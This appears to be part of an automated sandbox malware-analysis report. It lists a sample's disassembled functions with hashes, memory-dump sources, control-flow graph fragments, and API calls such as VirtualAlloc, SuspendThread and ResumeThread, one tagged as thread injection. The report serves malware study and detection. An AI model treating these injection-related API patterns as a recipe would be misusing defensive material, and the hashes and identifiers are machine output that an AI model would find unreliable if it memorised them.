                                                    • Opcode Fuzzy Hash: 4669b30c59a1c2d42ed7244de5300209d7214a3a49bf7db961b7a34cc688e796
                                                    • Instruction Fuzzy Hash: B5014931F0E65D4BFBF49AA448181BD3BD1DF49340F050A36E10EE71A1DD663E058B51
                                                    Function 00007FFD9BFBB9ED Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 352acee358f051056a56fdc822fc75c8b6261adfb1ebb1a4de2b7e4d28a7a1bc
                                                    • Instruction ID: d465bb2885c69ccf6fd168dc56212d6a42f311aabb1acdb69a7a1e3affbec1dd
                                                    • Opcode Fuzzy Hash: 352acee358f051056a56fdc822fc75c8b6261adfb1ebb1a4de2b7e4d28a7a1bc
                                                    • Instruction Fuzzy Hash: F6F02662E0E9AA4FE7789F9884714B47AE0EF54320F1603FAD55EC61E3ED1AB9404B01
                                                    Function 00007FFD9BFB1402 Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea66a77d9c0a3fca9dfd896abfcd23dcf26a09c180fe3718cb598d97bbcdfa90
                                                    • Instruction ID: 65cc82f8ba951445841a3448386e0cc907cdec9a750512fa93616a69f7742fee
                                                    • Opcode Fuzzy Hash: ea66a77d9c0a3fca9dfd896abfcd23dcf26a09c180fe3718cb598d97bbcdfa90
                                                    • Instruction Fuzzy Hash: 6CF0C23185F3C99FE3168FF088214A53FB4AF43200F1901FAD589870A2C96E1756CB62
                                                    Function 00007FFD9BFB10C3 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                    • Instruction ID: 0ed2ba3747e0295febd287eff5c1c45b0385c45c76dcb67856906c7ca3f369e7
                                                    • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                    • Instruction Fuzzy Hash: A0010074A1992C8FDFA8DF48C8A4BA8B7B1FB68301F1041D9C00EE3250CB319A84CF01
                                                    Function 00007FFD9BFBBA55 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa2297d4496a6480479f25852d350b19a509d6bdbafcb33771d828bd2c326676
                                                    • Instruction ID: c9d7375912aeb66b00afa9736811afb308649b479ab05ab1b4cf13156d7adf26
                                                    • Opcode Fuzzy Hash: fa2297d4496a6480479f25852d350b19a509d6bdbafcb33771d828bd2c326676
                                                    • Instruction Fuzzy Hash: 23E09231D1E28C8BD7619F5089650ECBB60EF10300F1502F6DA0D060A2DB2657089A42
                                                    Function 00007FFD9BFBE227 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
                                                    • Instruction ID: f8a20256a953020a9765622f4dae68d233e14309e5a5b0ee6e54573978519dca
                                                    • Opcode Fuzzy Hash: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
                                                    • Instruction Fuzzy Hash: 22E08610B0E2D64BE7B60A7448744347B908F0B3447090FF5C24A4A1D3C92A39049B11
                                                    Function 00007FFD9BFBECFB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                    • Instruction ID: f48bf204071db8e46fd2f9d1aaf1e3865130c866196026a3b1dfd9699e110c90
                                                    • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                    • Instruction Fuzzy Hash: DED0C934B0F57F85F1B95E81803023D95914F08301E264A3DD25F418E1CE6FB7016E13
                                                    Function 00007FFD9BFB2BFB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c95736e8b158f24f35fae0441b6a2a9885025fb07ad5ed8bdb50062498fc04d
                                                    • Instruction ID: 55c1ade6eecf6d9f2e64afa84f7d391da6df9fd2fa714bb308b460ec8ffb2f75
                                                    • Opcode Fuzzy Hash: 8c95736e8b158f24f35fae0441b6a2a9885025fb07ad5ed8bdb50062498fc04d
                                                    • Instruction Fuzzy Hash: DCD0C950B0F57F85F9795FC2A07123E5D909F00312E66463ED25F418E1CE2E77416E12
                                                    Function 00007FFD9BFB210F Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e88a4588bcecabdc841a2214fd17d3ec03417a7012c8e0872ec366c0a0965b2
                                                    • Instruction ID: be597c701720bba039f8dae0be3cd2d18df7586949e5abc0c48744fd61accdbd
                                                    • Opcode Fuzzy Hash: 2e88a4588bcecabdc841a2214fd17d3ec03417a7012c8e0872ec366c0a0965b2
                                                    • Instruction Fuzzy Hash: 22C08C10F0E21B5BEA322AE0986003C6AA00F06200B4A0671D34A8A2E3CD8839002A51

                                                    Non-executed Functions

                                                    Function 00007FFD9BA6005A Relevance: 11.3, Strings: 7, Instructions: 2565COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #+_-$%VG%$%VG%$%VG%$LR*e$LR*e$l0,H
                                                    • API String ID: 0-2477165230
                                                    • Opcode ID: 3f4389f17d5ca1238805fdc7e870fc83c23ffd2b416a7b5f126f03b9b242335f
                                                    • Instruction ID: 782b900898d9b3ea790121f60d4ef3ff1d9cfcf8dc53cd6084123eefb75c7b5f
                                                    • Opcode Fuzzy Hash: 3f4389f17d5ca1238805fdc7e870fc83c23ffd2b416a7b5f126f03b9b242335f
                                                    • Instruction Fuzzy Hash: 1043C970A145298FDBA9EB54C8A5BA977F1FF48300F4041EAD05EA72A6DE356EC1CF40
                                                    Function 00007FFD9B8B7D6C Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .
                                                    • API String ID: 0-248832578
                                                    • Opcode ID: 3ad63eb4cb5c929d6548403b37a8b28d0fde14e71b1f050658ab695d6ab97d39
                                                    • Instruction ID: 2553cb5b9b7c7958a557abb47922bd01b381d5e8761771f49372cc9de43eebdf
                                                    • Opcode Fuzzy Hash: 3ad63eb4cb5c929d6548403b37a8b28d0fde14e71b1f050658ab695d6ab97d39
                                                    • Instruction Fuzzy Hash: BE718F71E5022ACFEBB0CF68C881BDDBBF0AB49310F4582E5D45CE7645E634AA858F51
                                                    Function 00007FFD9BA656A5 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0_^
                                                    • API String ID: 0-3200571790
                                                    • Opcode ID: e22e191552d30c32eac96e925fc68779dda7a7340eabdf47d7b02cfa7ee0621c
                                                    • Instruction ID: 131956277c82b0ed42e7dc852992b11b298dc0c469e27f4372d2dc87025f3391
                                                    • Opcode Fuzzy Hash: e22e191552d30c32eac96e925fc68779dda7a7340eabdf47d7b02cfa7ee0621c
                                                    • Instruction Fuzzy Hash: 2741B452A4F7EAAFE3169BBCECBA4D57F90AF0212871D41B7C0D48E0A3D945624BC251
                                                    Function 00007FFD9BA6CEBD Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 683fdaffab96d1c070d6c19c0e8b562300ba0eba856a9ca39517461bf793a189
                                                    • Instruction ID: 145aaecbddb507c4226a240004cd1f082f12fc04fcd7b96568026a43205f6ffc
                                                    • Opcode Fuzzy Hash: 683fdaffab96d1c070d6c19c0e8b562300ba0eba856a9ca39517461bf793a189
                                                    • Instruction Fuzzy Hash: BB31E270E18A1D8FCF84DF98C451AADBBF1FB69300F2011AAD419E3291D675AA41CB44
                                                    Function 00007FFD9BA63558 Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b048e22cc16694eeb579ad8bfc232516b156e60529c7c29e86a9b6264fe0dc0
                                                    • Instruction ID: 726e22cc1a243ae7472b8ca418d2950338fa09a94ae9f9afe3ff42b259b2751e
                                                    • Opcode Fuzzy Hash: 7b048e22cc16694eeb579ad8bfc232516b156e60529c7c29e86a9b6264fe0dc0
                                                    • Instruction Fuzzy Hash: E4313631A0D29ADFD7199B64E8655EA7BE0EF01318B1401BBD089C70A3DB786655D780

                                                    Execution Graph

                                                    Execution Coverage:5.3%
                                                    Dynamic/Decrypted Code Coverage:81.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:16
                                                    Total number of Limit Nodes:0
                                                    execution_graph 38200 7ffd9bc91e95 38201 7ffd9bc91eaf GetFileAttributesW 38200->38201 38203 7ffd9bc91f75 38201->38203 38184 7ffd9bc901b9 38185 7ffd9bc901c7 CloseHandle 38184->38185 38187 7ffd9bc902a4 38185->38187 38188 7ffd9bad0708 38189 7ffd9bae2e70 38188->38189 38190 7ffd9bae321d VirtualAlloc 38189->38190 38191 7ffd9bae3275 38190->38191 38192 7ffd9bc8e84d 38193 7ffd9bc8e85b SuspendThread 38192->38193 38195 7ffd9bc8e934 38193->38195 38196 7ffd9bc90050 38197 7ffd9bc9008b ResumeThread 38196->38197 38199 7ffd9bc90164 38197->38199

                                                    Executed Functions

                                                    Function 00007FFD9BAE9480 Relevance: 2.6, Strings: 2, Instructions: 133COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U$U
                                                    • API String ID: 0-2145350036
                                                    • Opcode ID: 824164d5f9818dc3b06a96e0bf6f57d306187580c9f6d0331506bfbd967a87a9
                                                    • Instruction ID: d5e7aeb9b870c2567b445b7ed7a15bbe766f07b4033b4b74a71d7b15c346e382
                                                    • Opcode Fuzzy Hash: 824164d5f9818dc3b06a96e0bf6f57d306187580c9f6d0331506bfbd967a87a9
                                                    • Instruction Fuzzy Hash: BA51AD3090978D8FDB55DF64C915AEA7BF0FF05304F4501AAE858C71E2DB38AA58CB91
                                                    Function 00007FFD9BAEA5FA Relevance: 1.9, Strings: 1, Instructions: 688COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 9 7ffd9baea5fa-7ffd9bb14761 17 7ffd9bb14763 9->17 18 7ffd9bb14768-7ffd9bb147a1 9->18 17->18 19 7ffd9bb147a3 18->19 20 7ffd9bb147a8-7ffd9bb147fb 18->20 19->20 22 7ffd9bb147fd 20->22 23 7ffd9bb14802-7ffd9bb1484b call 7ffd9baea6f8 20->23 22->23 26 7ffd9bb1484d 23->26 27 7ffd9bb14852-7ffd9bb148ab 23->27 26->27 29 7ffd9bb148ad 27->29 30 7ffd9bb148b2-7ffd9bb1491b call 7ffd9bb0f8b0 27->30 29->30 34 7ffd9bb1491d 30->34 35 7ffd9bb14922-7ffd9bb1497b 30->35 34->35 38 7ffd9bb1497d 35->38 39 7ffd9bb14982-7ffd9bb149e7 call 7ffd9bb0f8b0 35->39 38->39 44 7ffd9bb149ee-7ffd9bb14a56 39->44 45 7ffd9bb149e9 39->45 50 7ffd9bb14a5d-7ffd9bb14a79 44->50 51 7ffd9bb14a58 44->51 45->44 52 7ffd9bb14a7f-7ffd9bb14acb 50->52 51->50 53 7ffd9bb14acd 52->53 54 7ffd9bb14ad2-7ffd9bb14b27 52->54 53->54 57 7ffd9bb14b2e-7ffd9bb14b93 54->57 58 7ffd9bb14b29 54->58 63 7ffd9bb14b95 57->63 64 7ffd9bb14b9a-7ffd9bb14bf7 57->64 58->57 63->64 67 7ffd9bb14bfe-7ffd9bb14c67 64->67 68 7ffd9bb14bf9 64->68 74 7ffd9bb14c6e-7ffd9bb14ce7 67->74 75 7ffd9bb14c69 67->75 68->67 77 7ffd9bb14cee-7ffd9bb14cfb 74->77 78 7ffd9bb14ce9 74->78 75->74 80 7ffd9bb14cfe-7ffd9bb14d02 77->80 78->77 81 7ffd9bb14d1f-7ffd9bb151b5 call 7ffd9baee2d0 call 7ffd9bb08660 call 7ffd9baee2d0 call 7ffd9bb08660 call 7ffd9baee2d0 call 7ffd9bb08660 80->81 82 7ffd9bb14d04-7ffd9bb14d1d 80->82 102 7ffd9bb1532a-7ffd9bb15394 call 7ffd9baee2d0 call 7ffd9bb08660 81->102 103 7ffd9bb151bb-7ffd9bb151c5 call 7ffd9bb0c640 81->103 82->81 110 7ffd9bb1555a-7ffd9bb15636 call 7ffd9bb0fec0 102->110 111 7ffd9bb1539a-7ffd9bb153a1 102->111 103->102 111->80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 10eeffe60740594637b2ca0789008db9c05e56962bbea82ddaea2f991306f72d
                                                    • Instruction ID: a496be9588e0dea7bb0fdd3adc174b68dd360b7d964e5a2614d751a74810fb5a
                                                    • Opcode Fuzzy Hash: 10eeffe60740594637b2ca0789008db9c05e56962bbea82ddaea2f991306f72d
                                                    • Instruction Fuzzy Hash: E332D03191D78D8FDB55EF68C868AEA7BB0FF16314F0541EBD448C71A2DA34A588CB41
                                                    Function 00007FFD9BAEA6F8 Relevance: 1.8, Strings: 1, Instructions: 512COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 117 7ffd9baea6f8-7ffd9bb1484b 119 7ffd9bb1484d 117->119 120 7ffd9bb14852-7ffd9bb148ab 117->120 119->120 122 7ffd9bb148ad 120->122 123 7ffd9bb148b2-7ffd9bb1491b call 7ffd9bb0f8b0 120->123 122->123 127 7ffd9bb1491d 123->127 128 7ffd9bb14922-7ffd9bb1497b 123->128 127->128 131 7ffd9bb1497d 128->131 132 7ffd9bb14982-7ffd9bb149e7 call 7ffd9bb0f8b0 128->132 131->132 137 7ffd9bb149ee-7ffd9bb14a56 132->137 138 7ffd9bb149e9 132->138 143 7ffd9bb14a5d-7ffd9bb14a79 137->143 144 7ffd9bb14a58 137->144 138->137 145 7ffd9bb14a7f-7ffd9bb14acb 143->145 144->143 146 7ffd9bb14acd 145->146 147 7ffd9bb14ad2-7ffd9bb14b27 145->147 146->147 150 7ffd9bb14b2e-7ffd9bb14b93 147->150 151 7ffd9bb14b29 147->151 156 7ffd9bb14b95 150->156 157 7ffd9bb14b9a-7ffd9bb14bf7 150->157 151->150 156->157 160 7ffd9bb14bfe-7ffd9bb14c67 157->160 161 7ffd9bb14bf9 157->161 167 7ffd9bb14c6e-7ffd9bb14ce7 160->167 168 7ffd9bb14c69 160->168 161->160 170 7ffd9bb14cee-7ffd9bb14cfb 167->170 171 7ffd9bb14ce9 167->171 168->167 173 7ffd9bb14cfe-7ffd9bb14d02 170->173 171->170 174 7ffd9bb14d1f-7ffd9bb151b5 call 7ffd9baee2d0 call 7ffd9bb08660 call 7ffd9baee2d0 call 7ffd9bb08660 call 7ffd9baee2d0 call 7ffd9bb08660 173->174 175 7ffd9bb14d04-7ffd9bb14d1d 173->175 195 7ffd9bb1532a-7ffd9bb15394 call 7ffd9baee2d0 call 7ffd9bb08660 174->195 196 7ffd9bb151bb-7ffd9bb151c5 call 7ffd9bb0c640 174->196 175->174 203 7ffd9bb1555a-7ffd9bb15636 call 7ffd9bb0fec0 195->203 204 7ffd9bb1539a-7ffd9bb153a1 195->204 196->195 204->173
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 52f5d9abe530d935a73c4c5b0bc5fde64946b8a3fc778b0404453550c4dd3267
                                                    • Instruction ID: cb950ef8fb99a685549ec3f45515d07c6d6ec5de59958621d35beb87b294566b
                                                    • Opcode Fuzzy Hash: 52f5d9abe530d935a73c4c5b0bc5fde64946b8a3fc778b0404453550c4dd3267
                                                    • Instruction Fuzzy Hash: 7002903091978D8FDB95EF68C869AE97BF0FF16304F0541EAD448C71A2DA34AA94CB41
                                                    Function 00007FFD9BAD0708 Relevance: 1.7, APIs: 1, Instructions: 477memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bad0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 19b5b32f5b7d70ce3bf05a1f4f239260ee89ff6eaad26842024c487d9155eac6
                                                    • Instruction ID: a80920d5948eb8a48150ddcfde82308a4bbd5d30afd10c9d68e5a285ab1460dc
                                                    • Opcode Fuzzy Hash: 19b5b32f5b7d70ce3bf05a1f4f239260ee89ff6eaad26842024c487d9155eac6
                                                    • Instruction Fuzzy Hash: 4EF19E3090964D8FDB95EFA8C855AEDBBF0FF59300F0141AAE408D32A6DB74A995CB41
                                                    Function 00007FFD9BC90050 Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 265 7ffd9bc90050-7ffd9bc90089 266 7ffd9bc9008b 265->266 267 7ffd9bc9008c-7ffd9bc90162 ResumeThread 265->267 266->267 271 7ffd9bc9016a-7ffd9bc901b4 267->271 272 7ffd9bc90164 267->272 272->271
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: bfa32f547bc29c70724d7361343cc261e4cd8e7a4aa5820f790d1aa20ec5ef44
                                                    • Instruction ID: c150b7c40dbb2b2f5ad99314bedad266d64782b855a8d72f6dff1ae663264bfa
                                                    • Opcode Fuzzy Hash: bfa32f547bc29c70724d7361343cc261e4cd8e7a4aa5820f790d1aa20ec5ef44
                                                    • Instruction Fuzzy Hash: 50518A70D0978C8FDB95DFA8C854AEDBBF0EF1A310F0441AAD049DB292DA749886CB11
                                                    Function 00007FFD9BC8E84D Relevance: 1.6, APIs: 1, Instructions: 138threadinjectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 275 7ffd9bc8e84d-7ffd9bc8e859 276 7ffd9bc8e85b-7ffd9bc8e863 275->276 277 7ffd9bc8e864-7ffd9bc8e932 SuspendThread 275->277 276->277 280 7ffd9bc8e93a-7ffd9bc8e984 277->280 281 7ffd9bc8e934 277->281 281->280
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: bf113f23392f2735003b4d75db0e95d4d51ce05e3d27c9d03bdd708663f530bd
                                                    • Instruction ID: e120392d046b5e8aeb840ca84bf88cc85237133ac7b2c8df8352eda152055428
                                                    • Opcode Fuzzy Hash: bf113f23392f2735003b4d75db0e95d4d51ce05e3d27c9d03bdd708663f530bd
                                                    • Instruction Fuzzy Hash: 02416B70E0864C8FDB98DFA8D894BEDBBB0FF5A310F10416AD049E7292DA70A845CB41
                                                    Function 00007FFD9BC91E95 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 284 7ffd9bc91e95-7ffd9bc91f73 GetFileAttributesW 288 7ffd9bc91f75 284->288 289 7ffd9bc91f7b-7ffd9bc91fb9 284->289 288->289
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2981876795.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bc80000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: c9e1836bc3aa8c54d4b1e40ab7012d56441323496c157eeaa19011504c77e6b4
                                                    • Instruction ID: 07da5c6bbb51b85efb83ecb83042c2a32170774616418eb2490b7e9d4c4503b3
                                                    • Opcode Fuzzy Hash: c9e1836bc3aa8c54d4b1e40ab7012d56441323496c157eeaa19011504c77e6b4
                                                    • Instruction Fuzzy Hash: C9410A70E0865C8FDB98DFA8D895BEDBBF0FB59311F10416AD009E7251DA719845CF41
                                                    Function 00007FFD9BAF1DD8 Relevance: 1.6, Strings: 1, Instructions: 310COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: a3347b8efc659e782cd7d2870dac0f86ec1a5c75185db64a2d66be65a15f88ce
                                                    • Instruction ID: 26b01fb32874a198e1d6fce4665ba2a18b78e9cf2bc06579d2acf8778c475da9
                                                    • Opcode Fuzzy Hash: a3347b8efc659e782cd7d2870dac0f86ec1a5c75185db64a2d66be65a15f88ce
                                                    • Instruction Fuzzy Hash: C4B1933091968D8FDB55EF68C869AED7BF0FF59304F0541ABD408C71A2DB34A694CB41
                                                    Function 00007FFD9C1DD584 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N^H
                                                    • API String ID: 0-4206628934
                                                    • Opcode ID: b1de354ef30b979bdee58b1051e79c47f6b8a137f654dc6e76555f5bb6b42716
                                                    • Instruction ID: 98f379fd8f37f9cd3fa04584141642bedf20f21b908f185b9616aebdb12079f2
                                                    • Opcode Fuzzy Hash: b1de354ef30b979bdee58b1051e79c47f6b8a137f654dc6e76555f5bb6b42716
                                                    • Instruction Fuzzy Hash: 0391E432F0DA4A8FEB95EB6888646B87BF1EF45340F4502FAD04DD71E2DE28A845C751
                                                    Function 00007FFD9BAE9340 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
